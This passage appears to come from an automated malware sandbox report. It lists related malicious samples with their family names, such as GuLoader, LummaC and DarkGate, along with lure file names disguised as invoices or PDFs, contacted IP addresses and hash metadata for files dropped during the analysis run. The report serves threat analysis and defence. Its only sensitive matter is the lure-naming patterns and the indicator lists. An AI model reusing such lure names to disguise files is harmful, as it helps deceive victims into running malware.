	drivers.exe	Get hash	malicious	Unknown	Browse	104.21.87.65 174.138.125.138 172.217.17.46 142.250.181.100
	GameBoxMini.exe	Get hash	malicious	Unknown	Browse	104.21.87.65 174.138.125.138 172.217.17.46 142.250.181.100
	drivers.exe	Get hash	malicious	Unknown	Browse	104.21.87.65 174.138.125.138 172.217.17.46 142.250.181.100
	Justificante pago-09453256434687.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.87.65 174.138.125.138 172.217.17.46 142.250.181.100
	https://docsend.com/v/ty7vw/up-date	Get hash	malicious	Unknown	Browse	104.21.87.65 174.138.125.138 172.217.17.46 142.250.181.100
	3gJQoqWpxb.bat	Get hash	malicious	Unknown	Browse	104.21.87.65 174.138.125.138 172.217.17.46 142.250.181.100
37f463bf4616ecd445d4a1937da06e19	PURCHASE ORDER TRC-0909718-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.87.65
	file.exe	Get hash	malicious	ScreenConnect Tool, Amadey, RHADAMANTHYS, XWorm, Xmrig	Browse	104.21.87.65
	Justificante pago-09453256434687.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.87.65
	ME-SPC-94.03.60.175.07.exe	Get hash	malicious	GuLoader	Browse	104.21.87.65
	09-FD-94.03.60.175.07.xlsx.exe	Get hash	malicious	GuLoader	Browse	104.21.87.65
	TEC-SPC-94.03.60.175.07.exe	Get hash	malicious	GuLoader	Browse	104.21.87.65
	ME-SPC-94.03.60.175.07.exe	Get hash	malicious	GuLoader	Browse	104.21.87.65
	09-FD-94.03.60.175.07.xlsx.exe	Get hash	malicious	GuLoader	Browse	104.21.87.65
	TEC-SPC-94.03.60.175.07.exe	Get hash	malicious	GuLoader	Browse	104.21.87.65
	pedido-035241.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.87.65

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Whatsapp-GUI.exe	Get hash	malicious	DarkGate, MailPassView	Browse
	Whatsapp-GUI.exe	Get hash	malicious	DarkGate, MailPassView	Browse
	Agreement for Cooperation.PDF.lnk.download.lnk	Get hash	malicious	RedLine	Browse
	malware.zip	Get hash	malicious	Unknown	Browse
	Dark_drop_2_pers_lum_clean.exe.bin.exe	Get hash	malicious	LummaC, DarkGate, LummaC Stealer, MailPassView	Browse
	Agreement for YouTube cooperation.pdf.lnk.download.lnk	Get hash	malicious	LummaC	Browse
	3rd_cc_form_Oct_2024.pdf.lnk.download.lnk	Get hash	malicious	LummaC	Browse
	tQ6Z4Vjp5f.lnk	Get hash	malicious	LummaC	Browse
	doc-Impostos.cmd	Get hash	malicious	Unknown	Browse
	AlBXxWizEX.msi	Get hash	malicious	DanaBot	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.7067080183506111
Encrypted:	false
SSDEEP:	1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6Vqy:2JIB/wUKUKQncEmYRTwh00B
MD5:	44E2A93EFF8D0809436D65C878F31A5C
SHA1:	3DCC212EA15D39277C137DF5CEEC821DD8F9F914
SHA-256:	ED86908AC7C2A6F8BD9357CF7E6278FD7DD0C92A38287524579B0FD2B807BA25
SHA-512:	760B7F8374F5DCA659C54811877D852AF22B4FB3F17E9DF005800B84897E1AFAF9112B2B31652F72963A8956D36DDD0F79C4A81BBA4279D2A11C561650059B2E
Malicious:	false
Preview:	...........@..@.+...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................u.f!.Lz3.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x5050588e, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.7900056722876722
Encrypted:	false
SSDEEP:	1536:zSB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:zazaPvgurTd42UgSii
MD5:	14084D74C10803AB7EECE1A90ACE1C16
SHA1:	5330F3DB9F5D91EDF97DC39142AB472007A263F2
SHA-256:	D0339BBADFECBBD5659F440CF7DF8C78A4A3F1B0F4B22F98F8FFBB4CF4C4E528
SHA-512:	797E9F2F794243360D54EB985D075308F0935C3B1835ADE204CF5D3E05A283CB88978C31D9AB5C48EB40E18AF85054DC1EC7CF37C05C816EAED07AAF1C96B8D1
Malicious:	false
Preview:	PPX.... ...............X\...;...{......................0.`.....42...{5......\|y.h.b.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........+...{...............................................................................................................................................................................................2...{..........................................\|...................{.B.....\|...........................#......h.b.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.0810316374210392
Encrypted:	false
SSDEEP:	3:Gcm/8YeafpZKzNt/57Dek3JPf3UlillEqW3l/TjzzQ/t:GcmUzgpZKzPR3tPf3UImd8/
MD5:	FF3F8154ADF33466CBDF442FBAEC0A1B
SHA1:	BAC43945784E4E97B8A1A3BA81CEB244651FA15E
SHA-256:	ACDADDB9C2433AD73616D1BDA4B1CFDF2B673D9DD10BC3A12E303001724C2E48
SHA-512:	684342017180689A26D3FB41326F7C8B6E375818B5E7F965F244D06086C8793455188727C9DBF6CCF4C0785ED3F2E837753067299EB414FA6EE55936D6B8D892
Malicious:	false
Preview:	.].9.....................................;...{.......\|..42...{5.........42...{5.42...{5...Y.42...{59.................{.B.....\|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	297
Entropy (8bit):	5.224068086897048
Encrypted:	false
SSDEEP:	6:7fQ+q2PcNwi2nKuAl9OmbnIFUt8OxgZmw+OxQVkwOcNwi2nKuAl9OmbjLJ:79vLZHAahFUt8Ou/+OC54ZHAaSJ
MD5:	FC288CFB0F53D5875CE16DE2E975209D
SHA1:	8967F865B0F51B895C7F097CB25D51D71AF265CA
SHA-256:	2A50A1A148BC91D41749C044FCB1ABE05C1A0033AF3D69247A198A3352855AE6
SHA-512:	022837509B8CCC521B27A0D2427DF184CB4EA561C39428A6017651B7DFCEFB82726D8E1725973103959EEC718C4D05967E3AB278F48FC8A3DA9F86F93C4FFF2B
Malicious:	false
Preview:	2024/12/17-02:10:21.544 2f8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/17-02:10:21.546 2f8 Recovering log #3.2024/12/17-02:10:21.546 2f8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	297
Entropy (8bit):	5.224068086897048
Encrypted:	false
SSDEEP:	6:7fQ+q2PcNwi2nKuAl9OmbnIFUt8OxgZmw+OxQVkwOcNwi2nKuAl9OmbjLJ:79vLZHAahFUt8Ou/+OC54ZHAaSJ
MD5:	FC288CFB0F53D5875CE16DE2E975209D
SHA1:	8967F865B0F51B895C7F097CB25D51D71AF265CA
SHA-256:	2A50A1A148BC91D41749C044FCB1ABE05C1A0033AF3D69247A198A3352855AE6
SHA-512:	022837509B8CCC521B27A0D2427DF184CB4EA561C39428A6017651B7DFCEFB82726D8E1725973103959EEC718C4D05967E3AB278F48FC8A3DA9F86F93C4FFF2B
Malicious:	false
Preview:	2024/12/17-02:10:21.544 2f8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/17-02:10:21.546 2f8 Recovering log #3.2024/12/17-02:10:21.546 2f8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	344
Entropy (8bit):	5.186606747754093
Encrypted:	false
SSDEEP:	6:7tavAVq2PcNwi2nKuAl9Ombzo2jMGIFUt8Ot2AgZmw+Ot9AIkwOcNwi2nKuAl9OU:7YAvLZHAa8uFUt8Oi/+Oj54ZHAa8RJ
MD5:	2EA8E0FF263C8A0A79FA7723FEDBBE77
SHA1:	BF5D287E72273A00D65E0200C140A4139C709CB9
SHA-256:	96B128A64621DAEA777744930CA7A78F69548533EBEA5D34FF4794B7787547AC
SHA-512:	9E400533E87054D54B42B1D876F74BA431895FE6313F0BBC622C92BCDB3E086A8240DFC7D732B45E2159014BFF56B0D505E9B535CF023F25CE66BC767E82CE1F
Malicious:	false
Preview:	2024/12/17-04:08:18.186 1d40 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/17-04:08:18.188 1d40 Recovering log #3.2024/12/17-04:08:18.189 1d40 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	344
Entropy (8bit):	5.186606747754093
Encrypted:	false
SSDEEP:	6:7tavAVq2PcNwi2nKuAl9Ombzo2jMGIFUt8Ot2AgZmw+Ot9AIkwOcNwi2nKuAl9OU:7YAvLZHAa8uFUt8Oi/+Oj54ZHAa8RJ
MD5:	2EA8E0FF263C8A0A79FA7723FEDBBE77
SHA1:	BF5D287E72273A00D65E0200C140A4139C709CB9
SHA-256:	96B128A64621DAEA777744930CA7A78F69548533EBEA5D34FF4794B7787547AC
SHA-512:	9E400533E87054D54B42B1D876F74BA431895FE6313F0BBC622C92BCDB3E086A8240DFC7D732B45E2159014BFF56B0D505E9B535CF023F25CE66BC767E82CE1F
Malicious:	false
Preview:	2024/12/17-04:08:18.186 1d40 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/17-04:08:18.188 1d40 Recovering log #3.2024/12/17-04:08:18.189 1d40 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	475
Entropy (8bit):	4.97063671378777
Encrypted:	false
SSDEEP:	12:YH/um3RA8sq4SsBdOg2HVcaq3QYiubSpDyP7E4TX:Y2sRdsfdMHU3QYhbSpDa7n7
MD5:	FD524AEC34A7791D6FFFAC080C80F7EF
SHA1:	9925FA9B4A2393DD1910D96FAC8C3B05705947C9
SHA-256:	10D70596CE0322B74819E5F19079450EA0C25D5FEF923F74872FE808A43E6008
SHA-512:	47EBFEFA4AD24C87350C330A7F1137FFAF580B61B0DA0150C88AF31EF313F3CE16B2A36D3C52167E2D847C1930471AA2AE12F0CBDA54B02E3C2EC2646FF4446C
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13378986508549948","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":953745},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.7","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\fc299c68-f149-43fc-8f6a-335c350abcce.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	JSON data
Category:	modified
Size (bytes):	475
Entropy (8bit):	4.97063671378777
Encrypted:	false
SSDEEP:	12:YH/um3RA8sq4SsBdOg2HVcaq3QYiubSpDyP7E4TX:Y2sRdsfdMHU3QYhbSpDa7n7
MD5:	FD524AEC34A7791D6FFFAC080C80F7EF
SHA1:	9925FA9B4A2393DD1910D96FAC8C3B05705947C9
SHA-256:	10D70596CE0322B74819E5F19079450EA0C25D5FEF923F74872FE808A43E6008
SHA-512:	47EBFEFA4AD24C87350C330A7F1137FFAF580B61B0DA0150C88AF31EF313F3CE16B2A36D3C52167E2D847C1930471AA2AE12F0CBDA54B02E3C2EC2646FF4446C
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13378986508549948","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":953745},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.7","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	4099
Entropy (8bit):	5.231506665519762
Encrypted:	false
SSDEEP:	96:CwNwpDGHqPySfkcr2smSX8I2OQCDh28wDtP7ikyGRh5:CwNw1GHqPySfkcigoO3h28ytP7ikLRh5
MD5:	0912C3C176F0B11809847E35E3642763
SHA1:	BCC93F9F75A58DBF2D659A20DC913FEF9DF57FA5
SHA-256:	C9AB725054E66732EC51CD12997AF0FBEFA3C9F1553BF3FC964199520AC84982
SHA-512:	C8A14B420D332F4EFEBB32354AA0A6282C1793E25D88A3126AF810F173E57FA7AA4D544628287606C5201D1ACBA426BECD7CE063B9F56017C54410D414C885DE
Malicious:	false
Preview:	...#................version.1..namespace-.aw.o................next-map-id.1.Pnamespace-aa11265e_f35e_4e5d_85db_f163e1c0f691-https://rna-resource.acrobat.com/.0I.$.r................next-map-id.2.Snamespace-9a9aa6d6_c307_4dda_b6c0_dc91084c8e68-https://rna-v2-resource.acrobat.com/.1!...r................next-map-id.3.Snamespace-1fbd9dc5_70a3_4975_91b4_966e0915c27a-https://rna-v2-resource.acrobat.com/.2..N.o................next-map-id.4.Pnamespace-0e0aed8d_6d6f_4be0_b28f_8e02158bc792-https://rna-resource.acrobat.com/.3.z.o................next-map-id.5.Pnamespace-52652c26_09c2_43f2_adf7_da56a1f00d32-https://rna-resource.acrobat.com/.4.{.^...............Pnamespace-aa11265e_f35e_4e5d_85db_f163e1c0f691-https://rna-resource.acrobat.com/.C..r................next-map-id.6.Snamespace-3a89c6b0_72b9_411a_9e44_fa247f34ac91-https://rna-v2-resource.acrobat.com/.5.q._r................next-map-id.7.Snamespace-02b23955_9103_42e0_ba64_3f8683969652-https://rna-v2-resource.acrobat.com/.6..d.o..............

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	332
Entropy (8bit):	5.176341600815473
Encrypted:	false
SSDEEP:	6:7ovAVq2PcNwi2nKuAl9OmbzNMxIFUt8OWvAgZmw+OhAIkwOcNwi2nKuAl9OmbzNq:7ZvLZHAa8jFUt8OS/+OB54ZHAa84J
MD5:	BB63832B130E21AF5BA2821B4BAD2C0B
SHA1:	93DBB0225999D411013E1A5DD1F91933AF69C520
SHA-256:	ED6E48701D0B9FAEFE7741E19093CF25057080EEA43F0D78B84105A635C373F1
SHA-512:	5B9210A4661EB522785DF3D31B8287A13E7DAED545CC40B8C9C6BEE657CFC699CFD29877A6B1080F156C2FC5F8C08B872B0613BB5396FE2533D453408BA3CFF8
Malicious:	false
Preview:	2024/12/17-04:08:19.011 1d40 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/17-04:08:19.017 1d40 Recovering log #3.2024/12/17-04:08:19.029 1d40 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	332
Entropy (8bit):	5.176341600815473
Encrypted:	false
SSDEEP:	6:7ovAVq2PcNwi2nKuAl9OmbzNMxIFUt8OWvAgZmw+OhAIkwOcNwi2nKuAl9OmbzNq:7ZvLZHAa8jFUt8OS/+OB54ZHAa84J
MD5:	BB63832B130E21AF5BA2821B4BAD2C0B
SHA1:	93DBB0225999D411013E1A5DD1F91933AF69C520
SHA-256:	ED6E48701D0B9FAEFE7741E19093CF25057080EEA43F0D78B84105A635C373F1
SHA-512:	5B9210A4661EB522785DF3D31B8287A13E7DAED545CC40B8C9C6BEE657CFC699CFD29877A6B1080F156C2FC5F8C08B872B0613BB5396FE2533D453408BA3CFF8
Malicious:	false
Preview:	2024/12/17-04:08:19.011 1d40 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/17-04:08:19.017 1d40 Recovering log #3.2024/12/17-04:08:19.029 1d40 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-241217090825Z-285.bmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PC bitmap, Windows 3.x format, 117 x -152 x 32, cbSize 71190, bits offset 54
Category:	dropped
Size (bytes):	71190
Entropy (8bit):	3.516007180281008
Encrypted:	false
SSDEEP:	768:y+3IP/yXGi86XeTOTukmP71HOiKbKBTxAdLo:yTqG30ekAT1uzbKBTxAVo
MD5:	D601D16C65F584DB6D4889DA74BEAEC6
SHA1:	B10286DF137E8E752DD15FE3B9865C3411F4A2E1
SHA-256:	54933AE9ED7C309714166C91F9AF62FC8F75791B64D8DE8664797ED8703E5C46
SHA-512:	91428779D7EB2EE48EC6D5CAD8FC00DB193896D69CC3FDD4244E5A59A7E7A3D6B5B6203738CBC04C3E3FBC7F59601386B5CA37D9A457FA3443089E467648B92D
Malicious:	false
Preview:	BM........6...(...u...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
Category:	dropped
Size (bytes):	86016
Entropy (8bit):	4.438924631823373
Encrypted:	false
SSDEEP:	384:yeaci5GXgquriBA7vEmzKNURFXoD1NC1SK0gkzPlrFzqFK/WY+lUTTcKqZ5bEmz5:1IurVgazUpUTTGt
MD5:	D71D2992A4E16DC2A2CFE2B4E99AEA42
SHA1:	BDA8051EDADE9163C1C0EC1236F5AD1F867EDA10
SHA-256:	61F5B5027BC838A4F03BF1A4EC54FF78906E3F68FB5D82A114F82C16F89AA779
SHA-512:	A7684062E074E81CA1E214D0FC11F3A51DF83843CAEF75A4824073ECE7231380F80719F717F84D89D36505FEE639D193B4E550B2336F9421F882300F9F860C32
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite Rollback Journal
Category:	dropped
Size (bytes):	8720
Entropy (8bit):	3.774389197432729
Encrypted:	false
SSDEEP:	48:7MXp/E2ioyVYKioy3DoWoy1CABoy1p5KOioy1noy1AYoy1Wioy1hioybioy3zoy5:7MpjuYK0iA17XKQkBDb9IVXEBodRBkd
MD5:	3E82874343A7A2FC3125B5BB2F9E5D9C
SHA1:	1EA67296F84AF2837C567B648381ECCE92DC09D1
SHA-256:	71C5BED4F7B41247E3889141A401CC8535713D7F8F1976FF5CAF8B7B09898BF7
SHA-512:	6A58044A03A9B19F0EB63B4E712CCD637AA6601074478A9F65B63576B1AFA730C242DF5C9BD0048E0586B0A66853CD9607B1EFB72B796E95C1B2F54304F03AFD
Malicious:	false
Preview:	.... .c.....9'.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b...r...t...}.....L..............................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	Certificate, Version=3
Category:	dropped
Size (bytes):	1391
Entropy (8bit):	7.705940075877404
Encrypted:	false
SSDEEP:	24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
MD5:	0CD2F9E0DA1773E9ED864DA5E370E74E
SHA1:	CABD2A79A1076A31F21D253635CB039D4329A5E8
SHA-256:	96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
SHA-512:	3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
Malicious:	false
Preview:	0..k0..S............@.YDc.c...0....H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0....H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.\|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I......A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.\|C.t..t.....0.[q6....00\H..;..}`...).........A.......\|.;F.H..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..\|o..;.....'...}~.."......

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	71954
Entropy (8bit):	7.996617769952133
Encrypted:	true
SSDEEP:	1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
MD5:	49AEBF8CBD62D92AC215B2923FB1B9F5
SHA1:	1723BE06719828DDA65AD804298D0431F6AFF976
SHA-256:	B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
SHA-512:	BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
Malicious:	false
Preview:	MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..\|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........\|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.\|.c.&>?..^t. ..;..X.d.E.0G....[Q.,......#.Dp..L.o\|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	192
Entropy (8bit):	2.7569015731729736
Encrypted:	false
SSDEEP:	3:kkFklUFcMlXfllXlE/HT8kmblJXNNX8RolJuRdxLlGB9lQRYwpDdt:kKNFllIT8tNMa8RdWBwRd
MD5:	3DC9F527B0D8033ABA30455EC2E2420C
SHA1:	6959BDE09C43D09D5A4E9E3C485279D7B72CEE74
SHA-256:	172EE6826400E6E83D494D494773051F5EBF99DA67B8693572FD23A8499286BF
SHA-512:	F7D24DB7E7961C6D52F7AF044A7DBC174B8CE8853E161DE3BD8C372EA6A74DD6355021202F1CAB66117A41CE55E1765CC8A1EC7CE180A498FB513788CD2FC5E8
Malicious:	false
Preview:	p...... .........`q.RP..(....................................................... ..........W...................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	data
Category:	modified
Size (bytes):	328
Entropy (8bit):	3.2478978672539016
Encrypted:	false
SSDEEP:	6:kK7RbV99UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:TJqDImsLNkPlE99SNxAhUe/3
MD5:	C1773A370F39DECA1E04DF027985A17B
SHA1:	DA9F16D3EF3D5ACEEB1EB3128FE7B50D4E4F82DB
SHA-256:	CC8A432E5D39419CC7B0F8F9F701B04D186B983271B940CF679F03027A3F0591
SHA-512:	AC8C43BB4B7392610365F4F532C6883CC8B09E447B7CC5E0456DBE26C34D2D3F27F39B3F2D469B1577B6DC7C9BEF8D39FAD91D7D975F60B6C3F5B0CEE56573B8
Malicious:	false
Preview:	p...... ........&...RP..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
